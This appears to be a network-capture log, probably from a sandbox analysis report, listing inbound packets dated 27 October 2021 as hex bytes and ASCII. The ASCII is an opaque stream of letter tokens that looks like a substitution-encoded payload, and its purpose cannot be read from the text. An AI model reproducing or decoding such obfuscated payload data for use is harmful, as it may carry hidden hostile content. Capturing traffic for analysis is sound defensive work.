                2021-10-27 01:03:26 UTC1144INData Raw: 71 20 71 77 77 20 71 71 68 20 70 71 20 77 4f 20 71 71 49 20 4f 20 65 71 4f 20 63 68 20 78 70 20 63 68 20 63 78 20 49 49 20 71 71 78 20 65 6a 49 20 65 6a 70 20 78 49 20 63 63 20 71 78 20 63 71 20 71 77 70 20 65 63 63 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 49 20 78 70 20 71 6a 63 20 71 70 71 20 78 4f 20 71 71 4f 20 77 78 20 71 68 70 20 71 77 49 20 71 63 6a 20 78 70 20 63 68 20 63 78 20 70 78 20 71 68 68 20 71 71 77 20 71 65 70 20 65 78 6a 20 4f 78 20 63 6a 20 71 71 78 20 63 63 20 63 65 20 65 65 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 63 78 20 78 65 20 71 4f 77 20 77 70 20 71 77 65 20 71 71 77 20 78 49 20 71 71 6a 20 71 70 65 20 71 63 49 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 4f 20 71 71 68 20 71 70 4f 20 71 70 65 20 70 77 20
                Data Ascii: q qww qqh pq wO qqI O eqO ch xp ch cx II qqx ejI ejp xI cc qx cq qwp ecc qqx qqw qhO qqe jI xp qjc qpq xO qqO wx qhp qwI qcj xp ch cx px qhh qqw qep exj Ox cj qqx cc ce eee qqw qhO qqe ch cx xe qOw wp qwe qqw xI qqj qpe qcI ch cx px qqx qO qqh qpO qpe pw
                2021-10-27 01:03:26 UTC1147INData Raw: 63 65 20 4f 63 20 63 71 20 65 65 49 20 65 6a 65 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 71 20 78 70 20 71 68 49 20 71 77 78 20 63 6a 20 71 71 49 20 78 20 71 68 70 20 71 49 70 20 71 78 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 49 20 71 71 77 20 71 49 63 20 65 6a 65 20 4f 71 20 63 78 20 77 68 20 63 63 20 65 65 68 20 65 68 63 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 63 78 20 65 68 63 20 65 71 20 71 71 77 20 65 78 20 71 71 6a 20 71 6a 70 20 65 78 68 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 63 20 71 68 4f 20 49 78 20 71 77 71 20 70 77 20 63 68 20 49 77 20 70 63 20 71 63 68 20 71 70 68 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 71 20 63 78 20 65 78 20 65 6a 63 20 65 49 20 71 68 77 20 63 20 63 71 20 65 78
                Data Ascii: ce Oc cq eeI eje qqx qqw qhO qqe cq xp qhI qwx cj qqI x qhp qIp qxh xp ch cx px qqI qqw qIc eje Oq cx wh cc eeh ehc qqw qhO qqe ch xO ch cx ehc eq qqw ex qqj qjp exh ch cx px qqx qqc qhO Ix qwq pw ch Iw pc qch qph qhO qqe ch xp cq cx ex ejc eI qhw c cq ex
                2021-10-27 01:03:26 UTC1151INData Raw: 78 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 70 6a 20 71 71 68 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 71 6a 4f 20 71 68 20 63 68 20 63 78 20 70 49 20 71 71 78 20 71 49 68 20 70 77 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 65 6a 20 71 68 49 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 71 77 71 20 71 78 20 63 68 20 63 78 20 70 63 20 71 71 78 20 4f 49 20 70 65 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 70 77 20 71 68 77 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 65 6a 4f 20 71 63 20 63 68 20 63 78 20 70 63 20 71 71 78 20 49 78 20 78 78 20 71 71 65 20 63 68 20 63 68 20 63 68 20 71 68 6a 20 65 71 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 4f 63 20 71 71 6a 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 68 78 20 78 78 20 71
                Data Ascii: x qqe ch xO ch qpj qqh qqx qqw qhp qqe qjO qh ch cx pI qqx qIh pw qqe ch xO ch qej qhI qqx qqw qhp qqe qwq qx ch cx pc qqx OI pe qqe ch xO ch pw qhw qqx qqw qhp qqe ejO qc ch cx pc qqx Ix xx qqe ch ch ch qhj eq qqx qqw qqh qqe Oc qqj ch cx pc qqx ehx xx q
                2021-10-27 01:03:26 UTC1155INData Raw: 65 20 63 68 20 78 4f 20 63 68 20 70 6a 20 6a 70 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 71 77 4f 20 49 49 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 70 70 20 6a 68 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 63 63 20 6a 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 71 65 77 20 49 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 78 68 20 65 63 20 71 71 65 20 63 68 20 63 68 20 63 68 20 71 63 71 20 6a 65 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 71 78 6a 20 49 70 20 63 68 20 63 78 20 70 68 20 71 71 78 20 71 77 65 20 65 63 20 71 71 65 20 63 68 20 63 6a 20 63 68 20 71 4f 63 20 6a 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 6a 71 20 49 4f 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 65 20 65 78 20 71 71 65 20 63 68 20 63 68
                Data Ascii: e ch xO ch pj jp qqx qqw qqq qqe qwO II ch cx pc qqx qpp jh qqe ch xO ch cc je qqx qqw qhp qqe qew Ip ch cx pc qqx exh ec qqe ch ch ch qcq je qqx qqw qqh qqe qxj Ip ch cx ph qqx qwe ec qqe ch cj ch qOc je qqx qqw qhp qqe jq IO ch cx pc qqx qe ex qqe ch ch
                2021-10-27 01:03:26 UTC1159INData Raw: 71 78 6a 20 63 71 20 65 78 77 20 70 78 20 71 78 78 20 49 4f 20 70 68 20 71 71 6a 20 65 78 6a 20 78 70 20 65 65 68 20 49 20 71 63 4f 20 71 71 63 20 71 4f 49 20 71 68 4f 20 71 77 49 20 71 49 20 71 77 78 20 63 78 20 71 49 77 20 70 78 20 71 4f 71 20 65 78 71 20 71 68 20 71 71 65 20 71 49 6a 20 78 70 20 65 6a 71 20 71 77 70 20 63 71 20 71 71 78 20 65 65 70 20 71 68 4f 20 71 77 78 20 71 70 65 20 70 77 20 63 68 20 71 49 77 20 70 78 20 71 6a 68 20 65 78 71 20 71 68 20 71 71 65 20 71 49 6a 20 78 70 20 78 70 20 71 77 4f 20 63 71 20 71 71 78 20 6a 49 20 71 68 78 20 71 6a 71 20 78 68 20 70 77 20 63 68 20 71 63 20 70 78 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 65 77 20 78 4f 20 71 4f 6a 20 78 78 20 78 49 20 71 71 77 20 6a 49 20 71 68 4f 20 71 6a 71 20 78 68 20
                Data Ascii: qxj cq exw px qxx IO ph qqj exj xp eeh I qcO qqc qOI qhO qwI qI qwx cx qIw px qOq exq qh qqe qIj xp ejq qwp cq qqx eep qhO qwx qpe pw ch qIw px qjh exq qh qqe qIj xp xp qwO cq qqx jI qhx qjq xh pw ch qc px qeO qqq qh qqe ew xO qOj xx xI qqw jI qhO qjq xh
                2021-10-27 01:03:26 UTC1163INData Raw: 65 65 70 20 71 68 78 20 71 65 6a 20 71 63 4f 20 71 78 70 20 49 6a 20 6a 71 20 70 65 20 4f 4f 20 65 71 49 20 71 20 71 71 78 20 65 63 71 20 78 4f 20 71 4f 6a 20 78 78 20 70 71 20 71 71 63 20 71 65 78 20 71 71 71 20 70 78 20 71 63 4f 20 4f 65 20 78 70 20 65 63 63 20 70 63 20 77 63 20 65 71 49 20 71 68 78 20 71 71 6a 20 65 63 71 20 78 4f 20 71 65 78 20 71 63 63 20 70 71 20 71 71 63 20 71 70 68 20 71 68 70 20 6a 4f 20 71 63 4f 20 71 6a 68 20 49 6a 20 4f 63 20 70 71 20 78 77 20 65 71 49 20 71 77 78 20 71 65 63 20 4f 71 20 63 6a 20 70 78 20 71 63 63 20 71 63 77 20 71 65 77 20 78 78 20 71 68 78 20 65 6a 77 20 78 49 20 65 63 63 20 49 6a 20 71 71 71 20 70 71 20 65 20 65 71 49 20 71 70 71 20 71 65 63 20 71 68 77 20 63 6a 20 77 78 20 71 63 63 20 77 63 20 71 71 4f 20
                Data Ascii: eep qhx qej qcO qxp Ij jq pe OO eqI q qqx ecq xO qOj xx pq qqc qex qqq px qcO Oe xp ecc pc wc eqI qhx qqj ecq xO qex qcc pq qqc qph qhp jO qcO qjh Ij Oc pq xw eqI qwx qec Oq cj px qcc qcw qew xx qhx ejw xI ecc Ij qqq pq e eqI qpq qec qhw cj wx qcc wc qqO
                2021-10-27 01:03:26 UTC1168INData Raw: 20 71 6a 71 20 78 68 20 63 6a 20 63 71 20 65 71 63 20 70 49 20 65 71 49 20 71 4f 49 20 71 71 68 20 71 71 49 20 65 71 71 20 63 68 20 65 78 63 20 71 63 49 20 70 77 20 71 71 70 20 78 71 20 71 68 4f 20 6a 49 20 71 63 6a 20 70 77 20 63 68 20 71 70 6a 20 70 49 20 65 68 65 20 65 65 6a 20 71 68 20 71 71 65 20 65 6a 63 20 63 6a 20 71 6a 6a 20 71 6a 63 20 71 63 20 4f 77 20 71 68 68 20 71 68 63 20 71 70 6a 20 71 6a 71 20 70 65 20 6a 6a 20 78 77 20 70 68 20 71 49 77 20 71 4f 49 20 65 68 63 20 71 71 65 20 65 6a 63 20 63 6a 20 71 77 63 20 78 65 20 49 71 20 4f 77 20 71 70 70 20 71 68 4f 20 71 78 65 20 71 63 78 20 49 78 20 6a 6a 20 65 6a 4f 20 70 71 20 71 78 4f 20 71 4f 49 20 65 68 20 4f 4f 20 4f 78 20 78 70 20 65 6a 78 20 71 63 4f 20 71 71 68 20 71 65 68 20 65 63 20 71
                Data Ascii: qjq xh cj cq eqc pI eqI qOI qqh qqI eqq ch exc qcI pw qqp xq qhO jI qcj pw ch qpj pI ehe eej qh qqe ejc cj qjj qjc qc Ow qhh qhc qpj qjq pe jj xw ph qIw qOI ehc qqe ejc cj qwc xe Iq Ow qpp qhO qxe qcx Ix jj ejO pq qxO qOI eh OO Ox xp ejx qcO qqh qeh ec q
                2021-10-27 01:03:26 UTC1179INData Raw: 65 77 20 65 49 20 6a 20 6a 20 63 68 20 71 71 63 20 4f 6a 20 4f 71 20 6a 49 20 65 4f 20 65 77 20 70 20 6a 68 20 77 68 20 78 70 20 4f 77 20 77 4f 20 6a 4f 20 49 20 71 49 20 68 20 4f 78 20 71 71 6a 20 4f 63 20 4f 63 20 77 68 20 63 4f 20 65 70 20 71 49 20 6a 20 78 20 71 65 77 20 4f 63 20 70 49 20 70 6a 20 63 49 20 71 71 78 20 78 70 20 4f 20 65 63 20 77 68 20 4f 63 20 49 78 20 71 71 49 20 6a 70 20 65 4f 20 65 20 6a 68 20 71 77 20 70 68 20 4f 65 20 70 77 20 71 71 4f 20 6a 65 20 49 20 77 20 78 20 71 70 20 77 71 20 49 70 20 70 77 20 63 78 20 71 77 20 65 65 20 65 70 20 65 63 20 6a 71 20 49 78 20 71 71 78 20 49 78 20 70 4f 20 6a 63 20 71 20 65 68 20 71 63 20 65 70 20 70 77 20 4f 4f 20 77 68 20 70 77 20 6a 65 20 65 6a 20 71 71 77 20 78 49 20 6a 71 20 4f 65 20 49 77
                Data Ascii: ew eI j j ch qqc Oj Oq jI eO ew p jh wh xp Ow wO jO I qI h Ox qqj Oc Oc wh cO ep qI j x qew Oc pI pj cI qqx xp O ec wh Oc Ix qqI jp eO e jh qw ph Oe pw qqO je I w x qp wq Ip pw cx qw ee ep ec jq Ix qqx Ix pO jc q eh qc ep pw OO wh pw je ej qqw xI jq Oe Iw
                2021-10-27 01:03:26 UTC1195INData Raw: 6a 20 78 6a 20 65 71 20 71 71 4f 20 4f 20 77 68 20 4f 78 20 65 78 20 63 70 20 68 20 65 71 20 49 49 20 4f 6a 20 49 20 70 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 63 65 20 71 65 68 20 78 20 77 63 20 71 68 71 20 4f 4f 20 65 68 20 63 78 20 78 71 20 65 65 20 71 65 6a 20 70 4f 20 71 71 4f 20 4f 49 20 71 70 20 65 63 20 65 20 65 68 20 63 6a 20 71 71 4f 20 49 20 71 71 77 20 63 20 71 71 65 20 70 49 20 49 49 20 4f 78 20 63 49 20 49 4f 20 4f 70 20 70 63 20 77 4f 20 71 68 65 20 78 63 20 71 49 20 6a 70 20 78 65 20 71 68 6a 20 4f 71 20 77 78 20 70 77 20 77 20 65 4f 20 77 65 20 71 68 4f 20 4f 78 20 70 71 20 70 6a 20 77 68 20 70 4f 20 6a 70 20 71 71 78 20 70 49 20 70 68 20 71 20 4f 6a 20 4f 78 20 71 65 77 20 4f 49 20 6a 68 20 63 4f 20 6a 20 63 68 20 6a 65 20 63
                Data Ascii: j xj eq qqO O wh Ox ex cp h eq II Oj I pc qq px pq we ep ce qeh x wc qhq OO eh cx xq ee qej pO qqO OI qp ec e eh cj qqO I qqw c qqe pI II Ox cI IO Op pc wO qhe xc qI jp xe qhj Oq wx pw w eO we qhO Ox pq pj wh pO jp qqx pI ph q Oj Ox qew OI jh cO j ch je c
                2021-10-27 01:03:26 UTC1211INData Raw: 68 70 20 6a 20 49 70 20 78 6a 20 4f 20 71 65 68 20 49 77 20 4f 65 20 78 20 71 71 20 77 20 6a 68 20 6a 70 20 65 78 20 77 20 71 65 77 20 71 65 78 20 71 71 49 20 65 71 20 6a 70 20 71 70 20 70 68 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 63 71 20 49 70 20 49 70 20 6a 65 20 71 77 20 71 68 68 20 70 4f 20 71 65 6a 20 49 49 20 71 68 6a 20 63 63 20 77 20 78 77 20 65 49 20 77 71 20 71 71 6a 20 65 20 71 65 68 20 71 68 4f 20 78 65 20 77 20 65 49 20 77 77 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 71 49 20 63 77 20 78 77 20 63 77 20 4f 6a 20 71 65 71 20 71 68 49 20 71 71 71 20 65 49 20 65 68 20 49 6a 20 71 20 49 77 20 77 78 20 4f 20 71 65 49 20 71 65 49 20 6a 77 20 78 70 20 6a 78 20 6a 63 20 78 4f 20 71 63 20 71 6a 20 63 68 20 65 71 20 71 68 63 20 6a 20 63
                Data Ascii: hp j Ip xj O qeh Iw Oe x qq w jh jp ex w qew qex qqI eq jp qp ph ww ch qO qc wq cq Ip Ip je qw qhh pO qej II qhj cc w xw eI wq qqj e qeh qhO xe w eI ww qc xp qw qq jw qI cw xw cw Oj qeq qhI qqq eI eh Ij q Iw wx O qeI qeI jw xp jx jc xO qc qj ch eq qhc j c
                2021-10-27 01:03:26 UTC1227INData Raw: 6a 4f 20 71 20 4f 4f 20 77 6a 20 6a 20 77 71 20 65 4f 20 77 4f 20 71 71 77 20 77 70 20 77 77 20 49 77 20 4f 6a 20 71 68 65 20 77 70 20 71 4f 20 65 77 20 63 49 20 78 78 20 49 78 20 77 20 4f 65 20 71 68 65 20 71 71 63 20 6a 65 20 65 4f 20 6a 77 20 49 71 20 6a 70 20 78 20 4f 70 20 71 71 49 20 71 65 71 20 49 71 20 65 49 20 49 63 20 78 71 20 78 71 20 4f 77 20 68 20 77 71 20 77 70 20 6a 70 20 71 68 20 6a 77 20 6a 78 20 49 70 20 49 70 20 71 71 6a 20 6a 20 71 65 49 20 71 68 65 20 65 78 20 49 77 20 63 49 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 4f 77 20 65 71 20 77 20 49 71 20 77 20 70 63 20 71 71 77 20 77 71 20 49 70 20 77 20 65 70 20 49 77 20 6a 70 20 63 20 77 68 20 71 68 65 20 71 65 49 20 71 68 71 20 4f 77 20 78 63 20 65 49 20 49 71 20 63 71 20 4f 78 20
                Data Ascii: jO q OO wj j wq eO wO qqw wp ww Iw Oj qhe wp qO ew cI xx Ix w Oe qhe qqc je eO jw Iq jp x Op qqI qeq Iq eI Ic xq xq Ow h wq wp jp qh jw jx Ip Ip qqj j qeI qhe ex Iw cI ww ch qO qc wq Ow eq w Iq w pc qqw wq Ip w ep Iw jp c wh qhe qeI qhq Ow xc eI Iq cq Ox
                2021-10-27 01:03:26 UTC1243INData Raw: 6a 20 78 20 65 78 20 63 78 20 71 65 77 20 70 4f 20 77 20 4f 77 20 63 6a 20 70 49 20 65 20 70 63 20 71 77 20 71 65 78 20 4f 20 71 71 77 20 71 71 6a 20 63 49 20 49 68 20 49 63 20 6a 77 20 49 63 20 4f 4f 20 71 6a 20 71 63 20 63 78 20 71 71 4f 20 77 4f 20 78 20 70 20 49 78 20 4f 63 20 71 68 63 20 65 65 20 71 68 68 20 71 71 20 68 20 63 63 20 6a 68 20 6a 65 20 71 65 6a 20 71 68 49 20 71 68 78 20 49 78 20 71 68 6a 20 65 49 20 6a 77 20 6a 6a 20 6a 63 20 49 20 70 77 20 71 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 49 63 20 68 20 4f 78 20 6a 20 71 20 71 68 68 20 77 68 20 63 63 20 78 65 20 70 20 4f 71 20 71 68 68 20 71 71 20 71 71 4f 20 63 4f 20 49 71 20 65 49 20 63 77 20 49 65 20 49 77 20 4f 63 20 70 63 20 71 71 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20
                Data Ascii: j x ex cx qew pO w Ow cj pI e pc qw qex O qqw qqj cI Ih Ic jw Ic OO qj qc cx qqO wO x p Ix Oc qhc ee qhh qq h cc jh je qej qhI qhx Ix qhj eI jw jj jc I pw qc qq px pq we ep Ic h Ox j q qhh wh cc xe p Oq qhh qq qqO cO Iq eI cw Ie Iw Oc pc qq qhc qqx pI ph
                2021-10-27 01:03:26 UTC1259INData Raw: 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 65 49 20 49 63 20 4f 63 20 71 20 71 68 77 20 49 4f 20 4f 78 20 65 20 49 68 20 65 78 20 70 71 20 71 65 20 71 77 20 77 20 4f 6a 20 4f 78 20 49 77 20 63 6a 20 65 65 20 6a 20 6a 6a 20 78 4f 20 71 63 20 71 6a 20 63 68 20 65 71 20 71 68 63 20 6a 20 65 4f 20 65 49 20 4f 20 71 65 78 20 70 71 20 71 68 4f 20 4f 68 20 49 68 20 49 20 68 20 65 20 4f 20 77 71 20 71 65 65 20 71 65 71 20 6a 20 49 65 20 49 63 20 63 63 20 71 78 20 63 78 20 49 20 77 65 20 77 71 20 6a 20 63 68 20 78 6a 20 49 78 20 63 6a 20 65 78 20 71 71 49 20 4f 65 20 70 63 20 77 49 20 49 6a 20 49 6a 20 49 70 20 78 49 20 65 6a 20 77 63 20 49 20 71 65 6a 20 71 71 4f 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20 71 20 71 68 77 20 70 4f 20 71 68 49 20 4f 49 20 63
                Data Ascii: qc xp qw qq jw eI Ic Oc q qhw IO Ox e Ih ex pq qe qw w Oj Ox Iw cj ee j jj xO qc qj ch eq qhc j eO eI O qex pq qhO Oh Ih I h e O wq qee qeq j Ie Ic cc qx cx I we wq j ch xj Ix cj ex qqI Oe pc wI Ij Ij Ip xI ej wc I qej qqO qhc qqx pI ph q qhw pO qhI OI c
                2021-10-27 01:03:26 UTC1275INData Raw: 6a 4f 20 4f 77 20 4f 71 20 63 20 70 65 20 63 4f 20 77 78 20 6a 63 20 63 4f 20 78 20 4f 68 20 70 77 20 71 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 49 68 20 71 68 4f 20 4f 77 20 71 68 4f 20 71 68 68 20 78 70 20 6a 4f 20 65 78 20 63 68 20 77 20 71 65 68 20 77 20 71 68 68 20 70 6a 20 65 20 63 20 6a 65 20 65 70 20 6a 78 20 71 68 49 20 70 65 20 71 71 63 20 71 71 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20 71 20 71 71 77 20 4f 68 20 49 49 20 49 20 65 20 71 49 20 49 77 20 70 20 65 65 20 71 65 63 20 71 65 49 20 49 4f 20 71 71 4f 20 65 49 20 65 63 20 65 65 20 6a 70 20 65 20 71 65 77 20 71 68 68 20 70 4f 20 71 65 77 20 65 65 20 71 68 20 49 6a 20 65 77 20 65 20 71 71 20 71 71 6a 20 4f 78 20 70 6a 20 71 70 20 65 68 20 49 6a 20 6a 71 20 65 63 20 77 71 20 70
                Data Ascii: jO Ow Oq c pe cO wx jc cO x Oh pw qc qq px pq we ep Ih qhO Ow qhO qhh xp jO ex ch w qeh w qhh pj e c je ep jx qhI pe qqc qq qhc qqx pI ph q qqw Oh II I e qI Iw p ee qec qeI IO qqO eI ec ee jp e qew qhh pO qew ee qh Ij ew e qq qqj Ox pj qp eh Ij jq ec wq p
                2021-10-27 01:03:26 UTC1291INData Raw: 68 20 6a 78 20 71 70 20 70 68 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 78 63 20 71 68 20 63 20 71 71 20 6a 71 20 4f 78 20 71 65 78 20 71 68 6a 20 4f 78 20 65 63 20 78 20 63 71 20 63 77 20 63 65 20 71 71 4f 20 65 20 4f 68 20 71 68 63 20 6a 4f 20 71 71 20 6a 20 49 68 20 77 77 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 49 71 20 49 65 20 49 65 20 65 4f 20 71 68 77 20 71 71 77 20 49 20 71 20 78 20 49 78 20 71 63 20 77 6a 20 6a 77 20 71 68 49 20 49 63 20 71 71 77 20 71 71 63 20 68 20 6a 68 20 65 77 20 71 71 20 65 6a 20 71 63 20 71 6a 20 63 68 20 65 71 20 71 68 63 20 6a 20 65 68 20 71 71 20 71 68 20 4f 4f 20 70 6a 20 71 65 77 20 71 71 77 20 6a 71 20 49 49 20 71 49 20 63 4f 20 6a 63 20 70 71 20 49 70 20 71 65 6a 20 49 20 65 4f 20 71 77 20 78 4f 20 4f
                Data Ascii: h jx qp ph ww ch qO qc wq xc qh c qq jq Ox qex qhj Ox ec x cq cw ce qqO e Oh qhc jO qq j Ih ww qc xp qw qq jw Iq Ie Ie eO qhw qqw I q x Ix qc wj jw qhI Ic qqw qqc h jh ew qq ej qc qj ch eq qhc j eh qq qh OO pj qew qqw jq II qI cO jc pq Ip qej I eO qw xO O
                2021-10-27 01:03:26 UTC1307INData Raw: 77 20 70 77 20 49 49 20 71 71 20 63 77 20 71 49 20 65 68 20 71 71 65 20 71 71 6a 20 49 49 20 70 77 20 70 77 20 6a 65 20 65 6a 20 78 4f 20 70 20 71 4f 20 49 78 20 77 6a 20 49 49 20 49 49 20 63 4f 20 68 20 71 71 77 20 63 77 20 65 20 70 6a 20 4f 78 20 49 63 20 70 68 20 63 4f 20 68 20 65 78 20 78 6a 20 65 63 20 4f 65 20 70 71 20 4f 78 20 71 71 49 20 63 49 20 65 4f 20 65 65 20 49 20 71 71 65 20 49 63 20 70 63 20 77 68 20 71 68 63 20 65 71 20 77 20 71 20 65 20 63 78 20 4f 78 20 49 4f 20 49 63 20 4f 78 20 70 78 20 6a 6a 20 65 63 20 70 20 65 71 20 49 49 20 78 70 20 70 63 20 70 6a 20 6a 65 20 78 63 20 78 70 20 65 71 20 65 71 20 70 71 20 49 4f 20 77 68 20 70 77 20 63 78 20 6a 68 20 71 49 20 49 71 20 71 77 20 77 68 20 70 70 20 63 68 20 70 71 20 78 4f 20 49 20 78 65
                Data Ascii: w pw II qq cw qI eh qqe qqj II pw pw je ej xO p qO Ix wj II II cO h qqw cw e pj Ox Ic ph cO h ex xj ec Oe pq Ox qqI cI eO ee I qqe Ic pc wh qhc eq w q e cx Ox IO Ic Ox px jj ec p eq II xp pc pj je xc xp eq eq pq IO wh pw cx jh qI Iq qw wh pp ch pq xO I xe
                2021-10-27 01:03:26 UTC1323INData Raw: 6a 63 20 71 70 65 20 65 78 4f 20 71 71 63 20 71 68 68 20 65 6a 49 20 70 71 20 6a 49 20 63 63 20 63 6a 20 63 49 20 77 6a 20 71 71 4f 20 4f 49 20 71 65 77 20 65 78 68 20 71 63 63 20 78 4f 20 78 49 20 6a 4f 20 65 71 6a 20 70 6a 20 71 68 6a 20 65 6a 49 20 71 68 63 20 63 70 20 78 63 20 6a 63 20 71 70 6a 20 71 71 77 20 71 71 49 20 71 71 77 20 71 71 71 20 71 71 6a 20 49 68 20 78 63 20 63 63 20 6a 63 20 70 6a 20 71 65 68 20 71 65 6a 20 71 71 65 20 71 71 77 20 6a 63 20 71 77 49 20 65 63 71 20 78 6a 20 77 65 20 71 65 65 20 71 68 68 20 78 63 20 4f 70 20 71 77 4f 20 78 71 20 63 70 20 6a 4f 20 65 68 20 4f 4f 20 63 6a 20 71 68 68 20 71 71 65 20 78 70 20 63 49 20 6a 63 20 71 70 65 20 71 63 77 20 4f 4f 20 65 78 63 20 71 49 78 20 71 68 6a 20 63 6a 20 63 78 20 49 68 20 78
                Data Ascii: jc qpe exO qqc qhh ejI pq jI cc cj cI wj qqO OI qew exh qcc xO xI jO eqj pj qhj ejI qhc cp xc jc qpj qqw qqI qqw qqq qqj Ih xc cc jc pj qeh qej qqe qqw jc qwI ecq xj we qee qhh xc Op qwO xq cp jO eh OO cj qhh qqe xp cI jc qpe qcw OO exc qIx qhj cj cx Ih x
                2021-10-27 01:03:26 UTC1339INData Raw: 6a 20 71 65 77 20 71 71 6a 20 63 49 20 71 6a 49 20 6a 4f 20 71 78 20 65 70 20 70 70 20 65 78 77 20 63 6a 20 65 65 77 20 71 68 68 20 77 20 71 4f 77 20 65 68 20 71 70 20 70 78 20 77 20 65 65 71 20 77 63 20 71 78 49 20 77 4f 20 71 63 63 20 71 65 70 20 65 65 20 78 70 20 78 49 20 71 78 49 20 65 68 4f 20 77 68 20 65 78 63 20 6a 68 20 71 6a 71 20 6a 20 65 68 70 20 71 65 70 20 71 63 63 20 4f 77 20 71 65 70 20 65 65 65 20 71 49 63 20 71 77 63 20 71 6a 63 20 65 68 70 20 71 71 49 20 71 68 77 20 65 65 6a 20 71 68 78 20 4f 78 20 4f 63 20 78 65 20 4f 65 20 6a 6a 20 71 70 49 20 71 71 63 20 65 6a 49 20 71 71 6a 20 65 78 63 20 71 71 20 77 68 20 65 63 6a 20 71 77 68 20 71 68 77 20 70 20 65 78 65 20 71 77 63 20 65 71 49 20 65 65 63 20 65 65 4f 20 49 71 20 71 6a 78 20 49 4f
                Data Ascii: j qew qqj cI qjI jO qx ep pp exw cj eew qhh w qOw eh qp px w eeq wc qxI wO qcc qep ee xp xI qxI ehO wh exc jh qjq j ehp qep qcc Ow qep eee qIc qwc qjc ehp qqI qhw eej qhx Ox Oc xe Oe jj qpI qqc ejI qqj exc qq wh ecj qwh qhw p exe qwc eqI eec eeO Iq qjx IO
                2021-10-27 01:03:26 UTC1355INData Raw: 68 20 71 68 70 20 65 68 4f 20 65 71 6a 20 71 4f 63 20 65 68 63 20 77 70 20 71 71 20 63 4f 20 65 65 77 20 6a 6a 20 65 68 71 20 71 78 78 20 65 68 71 20 70 20 65 68 70 20 71 4f 6a 20 49 78 20 65 6a 6a 20 65 6a 6a 20 71 70 68 20 6a 6a 20 71 4f 49 20 71 49 70 20 71 63 6a 20 65 78 65 20 70 78 20 71 6a 68 20 65 65 4f 20 65 65 4f 20 49 78 20 71 4f 65 20 65 6a 4f 20 65 70 20 6a 20 65 68 63 20 4f 68 20 77 49 20 63 65 20 71 63 65 20 71 49 65 20 49 4f 20 78 4f 20 71 71 70 20 71 63 4f 20 68 20 71 6a 65 20 49 71 20 71 4f 70 20 65 68 20 71 4f 63 20 71 71 20 71 71 49 20 71 49 68 20 71 4f 68 20 65 78 78 20 49 68 20 71 65 65 20 70 63 20 70 63 20 65 68 49 20 63 63 20 71 63 4f 20 71 4f 70 20 65 78 4f 20 63 77 20 65 68 78 20 71 77 71 20 65 6a 49 20 65 78 63 20 71 77 4f 20 71
                Data Ascii: h qhp ehO eqj qOc ehc wp qq cO eew jj ehq qxx ehq p ehp qOj Ix ejj ejj qph jj qOI qIp qcj exe px qjh eeO eeO Ix qOe ejO ep j ehc Oh wI ce qce qIe IO xO qqp qcO h qje Iq qOp eh qOc qq qqI qIh qOh exx Ih qee pc pc ehI cc qcO qOp exO cw ehx qwq ejI exc qwO q
                2021-10-27 01:03:26 UTC1371INData Raw: 20 65 71 63 20 71 63 4f 20 71 49 6a 20 71 63 4f 20 71 68 77 20 65 68 49 20 65 65 63 20 6a 71 20 71 71 68 20 71 68 4f 20 71 20 4f 70 20 71 70 63 20 71 49 78 20 65 6a 70 20 70 63 20 71 71 6a 20 71 63 63 20 65 71 70 20 71 65 77 20 65 63 65 20 70 63 20 49 4f 20 71 6a 78 20 65 6a 78 20 71 77 78 20 71 70 68 20 6a 20 71 77 78 20 71 6a 70 20 71 6a 6a 20 71 49 68 20 70 65 20 71 49 49 20 77 68 20 71 77 4f 20 6a 65 20 71 49 6a 20 71 78 20 71 77 77 20 65 6a 20 65 68 77 20 49 4f 20 71 6a 70 20 71 68 4f 20 70 68 20 71 77 65 20 65 78 65 20 77 49 20 6a 63 20 49 63 20 63 71 20 78 20 65 78 78 20 65 63 78 20 71 68 49 20 71 49 70 20 63 71 20 71 65 78 20 71 6a 70 20 65 65 63 20 71 4f 20 65 68 4f 20 65 70 20 65 63 68 20 71 68 78 20 70 20 71 77 63 20 65 63 63 20 77 6a 20 71 71
                Data Ascii: eqc qcO qIj qcO qhw ehI eec jq qqh qhO q Op qpc qIx ejp pc qqj qcc eqp qew ece pc IO qjx ejx qwx qph j qwx qjp qjj qIh pe qII wh qwO je qIj qx qww ej ehw IO qjp qhO ph qwe exe wI jc Ic cq x exx ecx qhI qIp cq qex qjp eec qO ehO ep ech qhx p qwc ecc wj qq
